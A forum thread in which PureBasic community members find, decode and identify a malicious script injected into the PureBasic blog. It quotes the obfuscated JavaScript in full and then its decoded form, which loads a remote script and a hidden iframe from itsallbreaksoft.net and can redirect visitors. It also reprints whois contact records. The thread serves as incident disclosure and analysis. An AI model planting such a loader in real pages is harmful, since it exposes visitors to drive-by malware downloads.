Purebasic Blog

[luis]

I noticed this code in the PB Blog, near the </head> tag.

Code: Select all

<script language=javascript>document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E'));dF('%264Dtdsjqu%264Fepdvnfou/xsjuf%2639%2633%264Dtdsjqu%2631tsd%264E%266D%2633%2633%2C%2633iuuq%264B00jutbmmcsfbltpgu/ofu0uet0jo/dhj%264G3%2637tfpsfg%264E%2633%2CfodpefVSJDpnqpofou%2639epdvnfou/sfgfssfs%263%3A%2C%2633%2637qbsbnfufs%264E%2635lfzxpse%2637tf%264E%2635tf%2637vs%264E2%2637IUUQ%60SFGFSFS%264E%2633%2C%2631fodpefVSJDpnqpofou%2639epdvnfou/VSM%263%3A%2C%2633%2637efgbvmu%60lfzxpse%264Eopuefgjof%2633%2C%2633%266D%2633%264F%264D%266D0tdsjqu%264F%2633%263%3A%264C%264D0tdsjqu%264F%261B%264Dtdsjqu%264F%261Bjg%2639uzqfpg%2639i%263%3A%264E%264E%2633voefgjofe%2633%263%3A%268C%261%3A%261B%261%3Aepdvnfou/xsjuf%2639%2633%264Djgsbnf%2631tsd%264E%2638iuuq%264B00jutbmmcsfbltpgu/ofu0uet0jo/dhj%264G4%2637tfpsfg%264E%2633%2CfodpefVSJDpnqpofou%2639epdvnfou/sfgfssfs%263%3A%2C%2633%2637qbsbnfufs%264E%2635lfzxpse%2637tf%264E%2635tf%2637vs%264E2%2637IUUQ%60SFGFSFS%264E%2633%2C%2631fodpefVSJDpnqpofou%2639epdvnfou/VSM%263%3A%2C%2633%2637efgbvmu%60lfzxpse%264Eopuefgjof%2638%2631xjeui%264E2%2631ifjhiu%264E2%2631cpsefs%264E1%2631gsbnfcpsefs%264E1%264F%264D0jgsbnf%264F%2633%263%3A%264C%2631%261B%268E%261Bfmtf%2631jg%2639i/joefyPg%2639%2633iuuq%264B%2633%263%3A%264E%264E1%263%3A%268C%261B%261%3A%261%3Axjoepx/mpdbujpo%264Ei%264C%261B%268E%261B%264D0tdsjqu%264F1')</script>

I didn't try to unescape it and maybe my spider's senses are a little too paranoic, but ... are you aware of it ? Seem strange to put some code in the page this way, unless you want to hide the real content of the script.

[luis]

I'm looking into it (decoding the text)

Code: Select all

<script language="javascript">
function dF(s) {
var s1=unescape(s.substr(0,s.length-1)); 
var t='';
for(i=0;i<s1.length;i++)
t+=String.fromCharCode(s1.charCodeAt(i)-s.substr(s.length-1,1));
document.write(unescape(t));
}

then it call DF with more 'encrypted' text.

The resulting code seem to try want to redirect the browser to

http://itsallbreaksoft.net/tds/

the url exists

Uhm.. trying to execute some CGI code injecting the call in a IFRAME.

But the code seem missing at the moment, maybe all of this is in preparation of something ?

uhm.... Freak ? Fred ? I'm starting to believe this is some kind of malware ... well I would say it is!

[luis]

Checking with the mighty ip2c

Resolving itsallbreaksoft.net -> 122.115.63.2
Querying servers ...
All servers have replied (13.8 seconds).

Results for 122.115.63.2
from Asia Pacific Network Information Center (APNIC)

Country code : CN
Country name : China
World region : Asia
Org info : Beijingqishangzaixian Shujutongxinkejiyouxiangong

%% [whois.apnic.net node-2]
% Whois data copyright terms http://www.apnic.net/db/dbcopyright.html

inetnum: 122.115.32.0 - 122.115.63.255
netname: Qishangzaixian
descr: Beijingqishangzaixian Shujutongxinkejiyouxiangongsi
descr: Room 1908-1909, No.32, Beisanhuanxilu
descr: Beijing, China, 100086
country: CN
admin-c: JX107-AP
tech-c: CZ126-AP
mnt-by: MAINT-CNNIC-AP
status: ASSIGNED NON-PORTABLE
changed: ipas@cnnic.cn 20090412
source: APNIC

person: Jia Xiaojie
nic-hdl: JX107-AP
e-mail: jxj@netnic.com.cn
address: Langfang Kaifaqu Daguandi Xikou
phone: +86-10-62190003
fax-no: +86-10-62190007
country: CN
changed: jxj@netnic.com.cn 20091204
mnt-by: MAINT-NEW
source: APNIC

person: Chen Zhuo
nic-hdl: CZ126-AP
e-mail: jxj@netnic.com.cn
address: Langfang Kaifaqu Daguandi Xikou
phone: +86-10-62190003
fax-no: +86-10-62190007
country: CN
changed: jxj@netnic.com.cn 20091204
mnt-by: MAINT-NEW
source: APNIC

inetnum: 122.115.32.0 - 122.115.63.255
netname: Qishangzaixian
descr: Beijingqishangzaixian Shujutongxinkejiyouxiangongsi
descr: Room1908-1909, No.32, Beisanhuanxilu
descr: Beijing, China, 100086
country: CN
admin-c: JX15-CN
tech-c: CZ9-CN
mnt-by: MAINT-CN-PUTIAN
status: ASSIGNED NON-PORTABLE
changed: ipas@cnnic.cn 20090412
source: CNNIC

person: Jia Xiaojie
nic-hdl: JX15-CN
e-mail: jxj@netnic.com.cn
address: Langfang Kaifaqu Daguandi Xikou
phone: +86-10-62190003
fax-no: +86-10-62190007
country: CN
changed: jxj@netnic.com.cn 20091204
mnt-by: MAINT-NEW
source: CNNIC

person: Chen Zhuo
nic-hdl: CZ9-CN
e-mail: jxj@netnic.com.cn
address: Langfang Kaifaqu Daguandi Xikou
phone: +86-10-62190003
fax-no: +86-10-62190007
country: CN
changed: jxj@netnic.com.cn 20091204
mnt-by: MAINT-NEW
source: CNNIC

[Rings]

uih, looks definitly like a hack/redirect (atempt) from
our eastern friends.....
encrypted code has nothing to do in a html page......

[gnozal]

Virustotal results : JS Trojan Downloader (32.50%)

[luis]

Dear, old, faithful spider's senses.

I hope I haven't ruined someone's plans

This is what the code becomes in the end:

Code: Select all

<script>document.write("<script src=\""+"http://itsallbreaksoft.net/tds/in.cgi?2&seoref="+encodeURIComponent(document.referrer)+"&parameter=$keyword&se=$se&ur=1&HTTP_REFERER="+ encodeURIComponent(document.URL)+"&default_keyword=notdefine"+"\"><\/script>");</script>
<script>
if(typeof(h)=="undefined"){	
	document.write("<iframe src='http://itsallbreaksoft.net/tds/in.cgi?3&seoref="+encodeURIComponent(document.referrer)+"&parameter=$keyword&se=$se&ur=1&HTTP_REFERER="+ encodeURIComponent(document.URL)+"&default_keyword=notdefine' width=1 height=1 border=0 frameborder=0></iframe>"); 
}
else if(h.indexOf("http:")==0){
		window.location=h;
}
</script>

Would be nice to check how the code ended there, to avoid the same thing in the future !

A vulnerability of the blogging service ? Or someone accessed the admin interface with the right login/password ?

Bye.

[djes]

JS/Wonka trojan

[Fred]

It's removed but it's very wierd

[Inf0Byt3]

I've had some problems too with something that looked like this. After logging in my site's FTP account i noticed a folder that had a random name. Inside this folder there was a PHP script file and a text file with some garbage inside. So i searched the internet with parts of that script and found out it's name: adsttnmq1/sdioyslkjs2 attack (because it injects those strings in web pages). The strange thing is that I don't use scripts on my website nor PHP pages, except for the contact Perl script that is considered secure. So the only gate could be the one described on http://www.esuli.it/2009/03/24/adsttnmq ... /comments/ that is through a flaw in the hosting management software or through a FTP sniff attack. Lucky me it only modified pages for spam propagation and it wasn't something more dangerous.

The best thing to do is to send the malicious files to the hosting company maybe they will find the breach...

[Innesoft]

I went on a site a few months ago with this kind of injection attack. Strongly advise anyone who's been on the page to change all their ftp/logins/passwords etc.. as it propagates on your machine and across servers too, by crawling your local machine for ftp login credentials via a silent install, and downloads some very nasty stuff.

[Joakim Christiansen]

It's removed but it's very wierd

Well, not too weird! WordPress is a popular blog so of course there will be people doing all they can to find exploits.
http://www.marrowbones.com/commons/tech ... _word.html